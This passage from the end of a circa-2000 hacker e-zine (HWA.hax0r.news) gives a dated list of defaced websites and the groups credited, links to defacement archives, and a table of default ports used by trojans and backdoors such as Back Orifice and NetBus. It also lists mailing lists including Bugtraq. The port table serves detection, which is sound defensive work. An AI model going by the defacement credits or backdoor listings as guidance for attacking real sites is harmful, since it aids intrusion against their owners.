      [00.07.01] NT [kenton]               Rahal Schmitz Toyota (www.rahalschmitztoyota.com)
      [00.07.01] NT [System_Error_]        Edition Net (nt1.edition.net)
      [00.07.01] NT [ka0x]                 angelcity.wingnet.com.tw (angelcity.wingnet.com.tw)
      [00.07.01] Lb [#svun]                Superlearning Inc. (www.superlearning-inc.com)
      [00.07.01] NT [DeXeR]                United Nations Development Programme (www.unchina.org)
      [00.07.01] NT [DeXer]                Stillemans (www.stillemans.com)
      [00.07.01] Li [SuBZeRo]              www.ishyprint.co.il (www.ishyprint.co.il)
      [00.07.01] NT [DeXeR]                College of New Caledonia (www.cnc.bc.ca)
      [00.07.01] NT [DeXeR]                Association of South Central Oklahoma Governments (www.ascog.org)
      [00.07.01] NT [St3althy6 Labs]       North Dakota K12 Schools (www.cavalier.k12.nd.us)
      [00.07.01] Li [cyb3r fuck3rs]        White Force (www.whiteforce.com)
      [00.07.01] NT [Crime Boys]           All Ways Provedor de Acesso Internet (www.cult.com.br)          

     
      
      Hacker groups breakdown is available at Attrition.org
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      check out http://www.attrition.org/mirror/attrition/groups.html to see who
      you are up against. You can often gather intel from IRC as many of these
      groups maintain a presence by having a channel with their group name as 
      the channel name, others aren't so obvious but do exist.
      
      >Hacked Sites Start<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
      
      
      
      


      
      ========================================================================== 
      
      
      * Info supplied by the attrition.org mailing list.
      
      Cracked webpage archives (list from attrition)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://www.attrition.org/
      http://www.hackernews.com/archive/crackarch.html
      http://www.freespeech.org/resistance/
      http://www.rewted.org/cracked/
      http://www.403-security.org/
      http://www.projectgamma.com/defaced/
      http://www.ironboxtech.com/articles/
      http://www.net-security.org/
      http://www.netrus.net/users/beard/pages/hacks/
      http://212.205.141.128/grhack/html/default_hacking.html
      http://194.226.45.195/hacked/hacked.html
      http://alldas.de/crkidx1.htm ** NEW URL *** >http://defaced.alldas.de
      http://www.turkeynews.net/Hacked
      http://www.flashback.se/hack/
      http://www.dutchthreat.org/
      http://www.onething.com/archive/
      http://www.2600.com/hacked_pages/
      http://hysteria.sk/hacked/
      http://erazor.vrnet.gr/
      
      
      
      
      Cracked sites listed oldest to most recent...does anyone read these? huh? do ya? heh.
      
 
        and more sites at the attrition cracked web sites mirror:

                     http://www.attrition.org/mirror/attrition/index.html 
 
       -------------------------------------------------------------------------
       
  A.0                              APPENDICES
       _________________________________________________________________________
       
      By: joakim.von.braun@risab.se 
      Source: PSS
       
      Common Trojan ports to watch for:
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      After seeing several questions about traffic directed at ports as 31337 and
      12345 I've put together a list of all trojans known to me and the default
      ports they are using. Of course several of them could use any port, but I
      hope this list will maybe give you a clue of what might be going on.
      
      port     21 - Blade Runner, Doly Trojan, Fore, Invisible FTP, WebEx,
                    WinCrash
      port     23 - Tiny Telnet Server
      port     25 - Antigen, Email Password Sender, Haebu Coceda, Shtrilitz
                    Stealth, Terminator, WinPC, WinSpy
      port     31 - Hackers Paradise
      port     80 - Executor
      port    456 - Hackers Paradise
      port    555 - Ini-Killer, Phase Zero, Stealth Spy
      port    666 - Satanz Backdoor
      port   1001 - Silencer, WebEx
      port   1011 - Doly Trojan
      port   1170 - Psyber Stream Server, Voice
      port   1234 - Ultors Trojan
      port   1245 - VooDoo Doll
      port   1492 - FTP99CMP
      port   1600 - Shivka-Burka
      port   1807 - SpySender
      port   1981 - Shockrave
      port   1999 - BackDoor
      port   2001 - Trojan Cow
      port   2023 - Ripper
      port   2115 - Bugs
      port   2140 - Deep Throat, The Invasor
      port   2801 - Phineas Phucker
      port   3024 - WinCrash
      port   3129 - Masters Paradise
      port   3150 - Deep Throat, The Invasor
      port   3700 - Portal of Doom
      port   4092 - WinCrash
      port   4590 - ICQTrojan
      port   5000 - Sockets de Troie
      port   5001 - Sockets de Troie
      port   5321 - Firehotcker
      port   5400 - Blade Runner
      port   5401 - Blade Runner
      port   5402 - Blade Runner
      port   5569 - Robo-Hack
      port   5742 - WinCrash
      port   6670 - DeepThroat
      port   6771 - DeepThroat
      port   6969 - GateCrasher, Priority
      port   7000 - Remote Grab
      port   7300 - NetMonitor
      port   7301 - NetMonitor
      port   7306 - NetMonitor
      port   7307 - NetMonitor
      port   7308 - NetMonitor
      port   7789 - ICKiller
      port   9872 - Portal of Doom
      port   9873 - Portal of Doom
      port   9874 - Portal of Doom
      port   9875 - Portal of Doom
      port   9989 - iNi-Killer
      port 10067 - Portal of Doom
      port 10167 - Portal of Doom
      port 11000 - Senna Spy
      port 11223 - Progenic trojan
      port 12223 - Hack99 KeyLogger
      port 12345 - GabanBus, NetBus
      port 12346 - GabanBus, NetBus
      port 12361 - Whack-a-mole
      port 12362 - Whack-a-mole
      port 16969 - Priority
      port 20001 - Millennium
      port 20034 - NetBus 2 Pro
      port 21544 - GirlFriend
      port 22222 - Prosiak
      port 23456 - Evil FTP, Ugly FTP
      port 26274 - Delta
      port 31337 - Back Orifice
      port 31338 - Back Orifice, DeepBO
      port 31339 - NetSpy DK
      port 31666 - BOWhack
      port 33333 - Prosiak
      port 34324 - BigGluck, TN
      port 40412 - The Spy
      port 40421 - Masters Paradise
      port 40422 - Masters Paradise
      port 40423 - Masters Paradise
      port 40426 - Masters Paradise
      port 47262 - Delta
      port 50505 - Sockets de Troie
      port 50766 - Fore
      port 53001 - Remote Windows Shutdown
      port 61466 - Telecommando
      port 65000 - Devil
      
      You'll find the list on the following address:
      http://www.simovits.com/nyheter9902.html  (still in Swedish but it will be
      translated in the near future).
      
      To help anyone to detect trojan attacks, Im planning to add information
      about the original names of the executables, their size, where they usually
      are hiding, and the names of any helpfiles they may use. I will also add
      tools or links to tools that may be of your assistance.
      
      Feel free to get back to me with any comments or suggestions. If you find
      new trojans Ill love to get my hands on them, but please mail me first, as
      I dont need more than one copy. If you have live experiance of trojan
      attacks Im interested to read about your findings.
      
      Joakim
      
      joakim.von.braun@risab.se


  A.1 PHACVW, sekurity, security, cyberwar links
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

       The links are no longer maintained in this file, there is now a
      links section on the http://welcome.to/HWA.hax0r.news/ url so check
      there for current links etc.

      The hack FAQ (The #hack/alt.2600 faq)
      http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html
      
      Hacker's Jargon File (The quote file)
      http://www.lysator.liu.se/hackdict/split2/main_index.html
      
      New Hacker's Jargon File.
      http://www.tuxedo.org/~esr/jargon/ 
      
      
      
      HWA.hax0r.news Mirror Sites around the world:
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp ** NEW **
      http://datatwirl.intranova.net  ** NEW **
      http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ ** NEW **
      http://net-security.org/hwahaxornews ** NEW **
      http://www.sysbreakers.com/hwa ** NEW **
      http://www.attrition.org/hosted/hwa/
      http://www.attrition.org/~modify/texts/zines/HWA/
      http://www.hackunlimited.com/zine/hwa/ *UPDATED*
      http://www.ducktank.net/hwa/issues.html. ** NEW **
      http://www.alldas.de/hwaidx1.htm ** NEW ** CHANGED TO -> http://defaced.alldas.de
      http://www.csoft.net/~hwa/ 
      http://www.digitalgeeks.com/hwa.*DOWN*
      http://members.tripod.com/~hwa_2k
      http://welcome.to/HWA.hax0r.news/
      http://www.attrition.org/~modify/texts/zines/HWA/
      http://archives.projectgamma.com/zines/hwa/.  
      http://www.403-security.org/Htmls/hwa.hax0r.news.htm
      http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
      http://hwa.hax0r.news.8m.com/           
      http://www.fortunecity.com/skyscraper/feature/103/  
      

      International links:(TBC)
      ~~~~~~~~~~~~~~~~~~~~~~~~~

      Foreign correspondants and others please send in news site links that
      have security news from foreign countries for inclusion in this list
      thanks... - Ed

      
          
      Belgium.......: http://securax.org/cum/ *New address*
      (Dutch)         http://www.securax.org/ *New*

              
      
      Brasil........: http://www.psynet.net/ka0z              
            
                      http://www.elementais.cjb.net           
            
      Canada .......: http://www.hackcanada.com
      Croatia.......: http://security.monitor.hr
      
      Colombia......: http://www.cascabel.8m.com              
      
                      http://www.intrusos.cjb.net                                   
                      
      Finland ........http://hackunlimited.com/                
                      
      Germany ........http://www.alldas.de/ -> http://defaced.alldas.de
                      http://www.security-news.com/
      
      Indonesia.....: http://www.k-elektronik.org/index2.html 
      
                      http://members.xoom.com/neblonica/      
      
                      http://hackerlink.or.id/                
      
      Netherlands...: http://security.pine.nl/                
      
      Russia........: http://www.tsu.ru/~eugene/              
      
      Singapore.....: http://www.icepoint.com                 
      
      South Africa ...http://www.hackers.co.za       
                      http://www.hack.co.za ** DOWN AGAIN **
                      
                      http://www.posthuman.za.net 
 
                      
      Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first
                                               and best security related e-zine.
      
                      
                       
                      
                      
                      
    .za (South Africa) sites contributed by wyzwun tnx guy...                  
      
      


    Got a link for this section? email it to cruciphux@dok.org and i'll
    review it and post it here if it merits it.
   
    
      
    @HWA
    
A.2 Hot Hits
    ~~~~~~~~    

    Useless information for the curious:
    
    Country and domain hits to main news page main.php on hwa-security.net
    
    Only listed the top few countries, this counter was activated 12 Aug 2000
    and little to no advertising has been done (as is obvious from our hits)
    it IS interesting to see that Europe are our biggest draws.
    
    * The site and zine author and core HWA crew are based in Canada.
    
    Pageviews per domain
    1.  Network           987   15.95 %     2.  US Commercial  818  13.21 %
   *3.  Canada            207   3.34 %      4.  US Educational 168   2.71 %
    5.  Netherlands       160   2.58 %      6.  Germany        139   2.25 %
    7.  Australia         103   1.66 %      8.  Brazil          82   1.32 %
    9.  Sweden             80   1.29 %     10.  United Kingdom  76   1.23 %
    11. Croatia (Hrvatska) 72   1.16 %     12.  Norway          67   1.08 %
    13. Malaysia           53   0.86 %     14.  France          53   0.86 %
    15. Nicaragua          39   0.63 %     16.  Hungary         38   0.61 %
    17. Russian Federation 37   0.6 %      18.  Taiwan          37    0.6 %
    19. Israel             36   0.58 %     20.  Korea (South)   35    0.57 %
    21. Poland             35   0.57 %     22.  Unknown       2247   36.3 %

    Plus 70+ other countries showed trickledowns also.

   
        Pageviews per region
    1.  North-America     1247  20.15 %
    2.  Europe            1073  17.33 %
    3.  None (.net, .org) 1019  16.46 %
    4.  Asia               275  4.44 %
    5.  Australia          125  2.02 %
    6.  South America      117  1.89 %
    7.  Central America     67  1.08 %
    8.  Africa              20  0.32 %
    -   Unknown           2247  36.3 %
    
    Note the coverage, an interesting spread. several hits come from sites
    like .gov that were defaced by SKRU, GForce Pakistan and provided links
    to our page on their defacements. Jury is out as to wether this is a good
    or bad thing. I'll take it as a good thing for now. :p
    
    @HWA    
    
    
    

A.3 Mirror Sites List
    ~~~~~~~~~~~~~~~~~
    
    =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=                       
  
                       __  __ _
                      |  \/  (_)_ __ _ __ ___  _ __ ___
                      | |\/| | | '__| '__/ _ \| '__/ __|
                      | |  | | | |  | | | (_) | |  \__ \
                      |_|  |_|_|_|  |_|  \___/|_|  |___/
                      
                      
                      
   Some of these are not keeping up with new issues like they should be, you
   can always get the latest issue from www.csoft.net/~hwa or join us on IRC
   (EFnet) in channel #hwa.hax0r.news and check the topic or ask Cruciphux
   where the latest issues may be attained. I also upload all issues to 
   etext.org, the zines are available thru their ftp service, updates are slow.
   - Ed                 

                       


     New mirror sites
               
  ***   http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp   *** NEW *** 
  ***   http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/ ***      
        http://datatwirl.intranova.net * NEW * 
        http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
        http://net-security.org/hwahaxornews     
        http://www.attrition.org/hosted/hwa/
        http://hwazine.cjb.net/   
        http://www.hackunlimited.com/files/secu/papers/hwa/
        http://www.attrition.org/~modify/texts/zines/HWA/                                
      * http://hwa.hax0r.news.8m.com/           
      * http://www.fortunecity.com/skyscraper/feature/103/  
               
      * Crappy free sites of no use to anyone. too lazy to kill em.      
     
                
    *** Most likely to be up to date other than the main site.    
                        
                        
     
     HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
     thanks to airportman for the Cubesoft bandwidth. Also shouts out to all 
     our mirror sites! and p0lix for the (now expired) digitalgeeks archive
     tnx guys. 
     
     http://www.csoft.net/~hwa
     
     
     HWA.hax0r.news Mirror Sites:
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~
     http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp
     http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
     http://www.attrition.org/hosted/hwa/
     http://www.attrition.org/~modify/texts/zines/HWA/     
     http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT ** and -> http://defaced.alldas.de
     http://www.csoft.net/~hwa/           
     http://welcome.to/HWA.hax0r.news/ 
     http://www.attrition.org/~modify/texts/zines/HWA/
     http://www.projectgamma.com/archives/zines/hwa/
     http://www.403-security.org/Htmls/hwa.hax0r.news.htm
     
     
     @HWA
     
     
  
A.4  The hacker's Ethic (90's Style)
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
     
     
          _   _            _             _    _____ _   _     _
         | | | | __ _  ___| | _____ _ __( )__| ____| |_| |__ (_) ___
         | |_| |/ _` |/ __| |/ / _ \ '__|/ __|  _| | __| '_ \| |/ __|
         |  _  | (_| | (__|   <  __/ |   \__ \ |___| |_| | | | | (__
         |_| |_|\__,_|\___|_|\_\___|_|   |___/_____|\__|_| |_|_|\___|



     Sadly, due to the traditional ignorance and sensationalizing of the mass
     media, the once-noble term hacker has become a perjorative.
     
     Among true computer people, being called a hacker is a compliment. One of
     the traits of the true hacker is a profoundly antibureaucratic and
     democratic spirit. That spirit is best exemplified by the Hacker's Ethic.
     
     This ethic was best formulated by Steven Levy in his 1984 book Hackers:
     Heroes of the Computer Revolution. Its tenets are as follows:

      1 - Access to computers should be unlimited and total. 
      2 - All information should be free. 
      3 - Mistrust authority - promote decentralization. 
      4 - Hackers should be judged by their hacking not bogus criteria such as
          degrees, age, race, or position. 
      5 - You create art and beauty on a computer, 
      6 - Computers can change your life for the better. 

     The Internet as a whole reflects this ethic.
     
     @HWA
     
A.5  Sources *** (VERY incomplete)
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
                      ____
                     / ___|  ___  _   _ _ __ ___ ___ ___
                     \___ \ / _ \| | | | '__/ __/ _ Y __|
                      ___) | (_) | |_| | | | (_|  __|__ \
                     |____/ \___/ \__,_|_|  \___\___|___/


     Sources can be some, all, or none of the following (by no means complete
    nor listed in any degree of importance) Unless otherwise noted, like msgs
    from lists or news from other sites, articles and information is compiled
    and or sourced by Cruciphux no copyright claimed.


    News site.........................http://www.ukhackers.com/  *NEW*
    News site.........................http://www.hackernews.com.br/ *NEW* 
    News & I/O zine ................. http://www.antionline.com/
    Back Orifice/cDc..................http://www.cultdeadcow.com/
   *News site (HNN) .....,............http://www.hackernews.com/
    Help Net Security.................http://net-security.org/
    News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/
    NewsTrolls .(daily news ).........http://www.newstrolls.com/
    General Security/Exploits.........http://packetstorm.securify.com/
    News + Exploit archive ...........http://www.rootshell.com/beta/news.html
    CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
    News site+........................http://www.zdnet.com/
    News site+Security................http://www.gammaforce.org/
    News site+Security................http://www.projectgamma.com/
    News site+Security................http://securityhole.8m.com/
    News site+Security related site...http://www.403-security.org/ 
    News/Humour site+ ................http://www.innerpulse.com
    News/Techie news site.............http://www.slashdot.org
    News/Technology ..................http://www.technologyevaluation.com/ 
    
    * HNN Also archives back issues of their news, use the following url format
    
      http://www.hackernews.com/arch.html?012700
    
      where 01=Jan 27=Date 00=Year. They are archived here also as part of the
      compilation and broad archival concept we are trying to maintain with this
      publication. - Ed
    
    

    + Various mailing lists and some newsgroups, such as ...
    + other sites available on the HNN affiliates page, please see
      http://www.hackernews.com/affiliates.html as they seem to be popping up
      rather frequently ... see http://hwa-security.net links section for more.

    
    http://www.the-project.org/ .. IRC list/admin archives
    http://www.anchordesk.com/  .. Jesse Berst's AnchorDesk

    alt.hackers.malicious
    alt.hackers
    alt.2600
    BUGTRAQ
    ISN security mailing list
    ntbugtraq
    win2kbugtraq
    <+others>
    
    @HWA
    
    
    
A.6  Resources
     ~~~~~~~~~     
     
     Pulled for reworking.
     
     EoF
    

A.7  Submissions/Hints/Tips/Etc
     ~~~~~~~~~~~~~~~~~~~~~~~~~~
    
            ____        _               _         _
           / ___| _   _| |__  _ __ ___ (_)___ ___(_) ___  _ __  ___
           \___ \| | | | '_ \| '_ ` _ \| / __/ __| |/ _ \| '_ \/ __|
            ___) | |_| | |_) | | | | | | \__ \__ \ | (_) | | | \__ \
           |____/ \__,_|_.__/|_| |_| |_|_|___/___/_|\___/|_| |_|___/


    All submissions that are `published' are printed with the credits
    you provide, if no response is received by a week or two it is assumed
    that you don't care wether the article/email is to be used in an issue
    or not and may be used at my discretion.

    Looking for:

    Good news sites that are not already listed here OR on the HNN affiliates
    page at http://www.hackernews.com/affiliates.html

    Magazines (complete or just the articles) of breaking sekurity or hacker
    activity in your region, this includes telephone phraud and any other
    technological use, abuse hole or cool thingy. ;-) cut em out and send it
    to the drop box.


    - Ed
    
    
    

A.8 Mailing list Info
    ~~~~~~~~~~~~~~~~~



    Mailing List Subscription Info   (Far from complete)         Feb 1999
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~   ~~~~~~~~~~~~~~~~~~~         ~~~~~~~~

    ISS Security mailing list faq : http://www.iss.net/iss/maillist.html
    
    
    ATTRITION.ORG's Website defacement mirror and announcement lists
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    http://www.attrition.org/mirror/attrition/    
    http://www.attrition.org/security/lists.html
    
    --
      
      defaced [web page defacement announce list]
      
      This is a public LOW VOLUME (1) mail list to circulate news/info on 
      defaced web sites. To subscribe to Defaced, send mail to 
      majordomo@attrition.org with "subscribe defaced" in the BODY of 
      the mail.
      
      There will be two types of posts to this list:
      
              1. brief announcements as we learn of a web defacement.
                 this will include the site, date, and who signed the 
                 hack. we will also include a URL of a mirror of the hack.
      
              2. at the end of the day, a summary will be posted
                 of all the hacks of the day. these can be found
                 on the mirror site listed under 'relevant links'
      
      This list is for informational purposes only. Subscribing
      denotes your acceptance of the following:
      
              1. we have nothing to do with the hacks. at all.
      
              2. we are only mirroring the work of OTHER people.
      
              3. we can not be held liable for anything related to these
                 hacks.
      
              4. all of the points on the disclaimer listed below.
      
      Under no circumstances may the information on this list be used
      to solicit security business. You do not have permission to forward
      this mail to anyone related to the domain that was defaced.
      
      enjoy.
      
      List maintainer: mcintyre@attrition.org
      Hosted by: majordomo@attrition.org
      
      Relevant Links: 
              Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
              ATTRITION Mirror: http://www.attrition.org/mirror/
      
      (1) It is low volume on a normal day. On days of many defacements,
          traffic may be increased. On a few days, it is a virtual mail
          flood. You have been warned. ;)
      
    -=-
    
    --
      
      defaced summary [web page defacement announce list]
      
      This is a low traffic mail list to announce all publicly
      defaced domains on a given day. To subscribe to Defaced-Summary, send mail to 
      majordomo@attrition.org with "subscribe defaced-summary" in the BODY of 
      the mail.
      
      There will be ONE type of post to this list:
      
              1. a single nightly piece of mail listing all reported
                 domains. the same information can be found on
                 http://www.attrition.org/mirror/attrition/
                 via sporadic updates.
      
      This list is for informational purposes only. Subscribing
      denotes your acceptance of the following:
      
              1. we have nothing to do with the hacks. at all.
      
              2. we are only mirroring the work of OTHER people.
      
              3. we can not be held liable for anything related to these
                 hacks.
      
              4. all of the points on the disclaimer listed below.
      
      Under no circumstances may the information on this list be used
      to solicit security business. You do not have permission to forward
      this mail to anyone related to the domain that was defaced.
      
      enjoy.
      
      List maintainer: jericho@attrition.org
      Hosted by: majordomo@attrition.org
      
      Relevant Links: 
              Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
              ATTRITION Mirror: http://www.attrition.org/mirror/
              
              
     -=-
     
      defaced GM [web page defacement announce list]
      
      This is a low traffic mail list to announce all publicly
      defaced government and military domains on a given day. To subscribe to 
      Defaced-GM, send mail to majordomo@attrition.org with "subscribe defaced-gm" 
      in the BODY of the mail.
      
      There will be ONE type of post to this list:
      
              1. sporadic pieces of mail for each government (.gov)
                 or military (.mil) system defaced. the same information 
                 can be found on http://www.attrition.org/mirror/attrition/
                 via sporadic updates.
      
      This list is designed primarily for government and military
      personell charged with tracking security incidents on
      government run networks.
      
      This list is for informational purposes only. Subscribing
      denotes your acceptance of the following:
      
              1. we have nothing to do with the hacks. at all.
      
              2. we are only mirroring the work of OTHER people.
      
              3. we can not be held liable for anything related to these
                 hacks.
      
              4. all of the points on the disclaimer listed below.
      
      Under no circumstances may the information on this list be used
      to solicit security business. You do not have permission to forward
      this mail to anyone related to the domain that was defaced.
      
      enjoy.
      
      List maintainer: jericho@attrition.org
      Hosted by: majordomo@attrition.org
      
      Relevant Links: 
              Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
              ATTRITION Mirror: http://www.attrition.org/mirror/
              
     
      --
      
      defaced alpha [web page defacement announce list]
      
      This is a low traffic mail list to announce via alpha-numeric
      pagers, all publicly defaced government and military domains 
      on a given day. To subscribe to Defaced-Alpha, send mail to 
      majordomo@attrition.org with "subscribe defaced-alpha" in 
      the BODY of the mail.
      
      There will be ONE type of post to this list:
      
              1. sporadic pieces of mail for each government (.gov)
                 or military (.mil) system defaced. the information
                 will only include domain names. the same information 
                 can be found on http://www.attrition.org/mirror/attrition/
                 via sporadic updates.
      
      This list is designed primarily for government and military
      personell charged with tracking security incidents on
      government run networks. Further, it is designed for 
      quick response and aimed at law enforcement agencies like
      DCIS and the FBI.
      
      To subscribe to this list, a special mail will be sent to YOUR
      alpha-numeric pager. A specific response must be made within
      12 hours of receiving the mail to be subscribed. If the response
      is not received, it is assumed the mail was not sent to your 
      pager.
      
      This list is for informational purposes only. Subscribing
      denotes your acceptance of the following:
      
              1. we have nothing to do with the hacks. at all.
      
              2. we are only mirroring the work of OTHER people.
      
              3. we can not be held liable for anything related to these
                 hacks.
      
              4. all of the points on the disclaimer listed below.
      
      Under no circumstances may the information on this list be used
      to solicit security business. You do not have permission to forward
      this mail to anyone related to the domain that was defaced.
      
      enjoy.
      
      List maintainer: jericho@attrition.org
      Hosted by: majordomo@attrition.org
      
      Relevant Links: 
              Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
              ATTRITION Mirror: http://www.attrition.org/mirror/
      
         
      
    -=-     
      

    


    THE MOST READ:

    BUGTRAQ - Subscription info
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~

    What is Bugtraq?

    Bugtraq is a full-disclosure UNIX security mailing list, (see the info
    file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
    bugtraq, send mail to listserv@netspace.org containing the message body
    subscribe bugtraq. I've been archiving this list on the web since late
    1993. It is searchable with glimpse and archived on-the-fly with hypermail.

    Searchable Hypermail Index;

          http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html

          

    About the Bugtraq mailing list
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    The following comes from Bugtraq's info file:

    This list is for *detailed* discussion of UNIX security holes: what they are,
    how to exploit, and what to do to fix them.

    This list is not intended to be about cracking systems or exploiting their
    vulnerabilities. It is about defining, recognizing, and preventing use of
    security holes and risks.

    Please refrain from posting one-line messages or messages that do not contain
    any substance that can relate to this list`s charter.

    I will allow certain informational posts regarding updates to security tools,
    documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
    on this list.

    Please follow the below guidelines on what kind of information should be posted
    to the Bugtraq list:

    + Information on Unix related security holes/backdoors (past and present)
    + Exploit programs, scripts or detailed processes about the above
    + Patches, workarounds, fixes
    + Announcements, advisories or warnings
    + Ideas, future plans or current works dealing with Unix security
    + Information material regarding vendor contacts and procedures
    + Individual experiences in dealing with above vendors or security 
      organizations
    + Incident advisories or informational reporting

    Any non-essential replies should not be directed to the list but to the
    originator of the message. Please do not "CC" the bugtraq reflector 
    address if the response does not meet the above criteria.

    Remember: YOYOW.

    You own your own words. This means that you are responsible for the words
    that you post on this list and that reproduction of those words without 
    your permission in any medium outside the distribution of this list may be
    challenged by you, the author.

    For questions or comments, please mail me:
    chasin@crimelab.com (Scott Chasin)
    
    
    UPDATED Sept/99 - Sent in by Androthi, tnx for the update
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    

      I am pleased to inform you of several changes that will be occurring
      on June 5th. I hope you find them as exciting as I do.
      
      
      BUGTRAQ moves to a new home
      ---------------------------
      
      
      First, BUGTRAQ will be moving from its current home at NETSPACE.ORG
      to SECURITYFOCUS.COM. What is Security Focus you ask? Wait and read
      below. Other than the change of domains nothing of how the list
      is run changes. I am still the moderator. We play by the same rules.
      
      
      Security Focus will be providing mail archives for BUGTRAQ. The
      archives go back longer than Netspace's and are more complete than
      Geek-Girl's.
      
      
      The move will occur one week from today. You will not need to
      resubscribe. All your information, including subscription options
      will be moved transparently.
      
      
      Any of you using mail filters (e.g. procmail) to sort incoming
      mail into mail folders by examining the From address will have to
      update them to include the new address. The new address will be:
      
      
                            BUGTRAQ@SECURITYFOCUS.COM
      
      
      Security Focus also be providing a free searchable vulnerability
      database.
      
      
      BUGTRAQ es muy bueno
      --------------------
      
      
      It has also become apparent that there is a need for forums
      in the spirit of BUGTRAQ where non-English speaking people
      or people that don't feel comfortable speaking English can
      exchange information.
      
      
      As such I've decided to give BUGTRAQ in other languages a try.
      BUGTRAQ will continue to be the place to submit vulnerability
      information, but if you feel more comfortable using some other
      language you can give the other lists a try. All relevant information
      from the other lists which have not already been covered here
      will be translated and forwarded on by the list moderator.
      
      
      In the next couple of weeks we will be introducing BUGTRAQ-JP
      (Japanese) which will be moderated by Nobuo Miwa <n-miwa@lac.co.jp>
      and BUGTRAQ-SP (Spanish) which will be moderated by CORE SDI S.A.
      from Argentina <http://www.core-sdi.com/> (the folks that brought you
      Secure Syslog and the SSH insertion attack).
      
      
      What is Security Focus?
      -----------------------
      
      
      Security Focus is an exercise in creating a community and a security
      resource. We hope to be able to provide a medium where useful and
      successful resources such as BUGTRAQ can occur, while at the same
      time providing a comprehensive source of security information. Aside
      from moving just BUGTRAQ over, the Geek-Girl archives (and the Geek Girl
      herself!) have moved over to Security Focus to help us with building
      this new community. The other staff at Security Focus are largely derived
      from long time supporters of Bugtraq and the community in general. If
      you are interested in viewing the staff pages, please see the 'About'
      section on www.securityfocus.com.
      
      
      On the community creating front you will find a set of forums
      and mailing lists we hope you will find useful. A number of them
      are not scheduled to start for several weeks but starting today
      the following list is available:
      
      
      * Incidents' Mailing List. BUGTRAQ has always been about the
         discussion of new vulnerabilities. As such I normally don't approve
         messages about break-ins, trojans, viruses, etc with the exception
         of wide spread cases (Melissa, ADM worm, etc). The other choice
         people are usually left with is email CERT but this fails to
         communicate this important information to other that may be
         potentially affected.
      
      
         The Incidents mailing list is a lightly moderated mailing list to
         facilitate the quick exchange of security incident information.
         Topical items include such things as information about rootkits
         new trojan horses and viruses, source of attacks and tell-tale
         signs of intrusions.
      
      
         To subscribe email LISTSERV@SECURITYFOCUS.COM with a message body
         of:
      
      
                   SUBS INCIDENTS FirstName, LastName
      
      
      Shortly we'll also be introducing an Information Warfare forum along
      with ten other forums over the next two months. These forums will be
      built and moderated by people in the community as well as vendors who
      are willing to take part in the community building process.
      *Note to the vendors here* We have several security vendors who have
      agreed to run forums where they can participate in the online communities.
      If you would like to take part as well, mail Alfred Huger,
      ahuger@securityfocus.com.
      
      
      On the information resource front you find a large database of
      the following:
      
      
      * Vulnerabilities. We are making accessible a free vulnerability
         database. You can search it by vendor, product and keyword. You
         will find detailed information on the vulnerability and how to fix it,
         as well are links to reference information such as email messages,
         advisories and web pages. You can search by vendor, product and
         keywords. The database itself is the result of culling through 5
         years of BUGTRAQ plus countless other lists and news groups. It's
         a shining example of how thorough full disclosure has made a significant
         impact on the industry over the last half decade.
      
      
      * Products. An incredible number of categorized security products
         from over two hundred different vendors.
      
      
      * Services. A large and focused directory of security services offered by
         vendors.
      
      
      * Books, Papers and Articles. A vast number of categorized security
         related books, papers and articles. Available to download directly
         for our servers when possible.
      
      
      * Tools. A large array of free security tools. Categorized and
         available for download.
      
      
      * News: A vast number of security news articles going all the way
         back to 1995.
      
      
      * Security Resources: A directory to other security resources on
         the net.
      
      
      As well as many other things such as an event calendar.
      
      
      For your convenience the home-page can be personalized to display
      only information you may be interested in. You can filter by
      categories, keywords and operating systems, as well as configure
      how much data to display.
      
      
      I'd like to thank the fine folks at NETSPACE for hosting the
      site for as long as they have. Their services have been invaluable.
      
      
      I hope you find these changes for the best and the new services
      useful. I invite you to visit http://www.securityfocus.com/ and
      check it out for yourself. If you have any comments or suggestions
      please feel free to contact me at this address or at
      aleph1@securityfocus.com.
      
      
      Cheers.
      
      
      --
      Aleph One / aleph1@underground.org
      http://underground.org/
      KeyID 1024/948FD6B5
      Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01
      



    
    Crypto-Gram
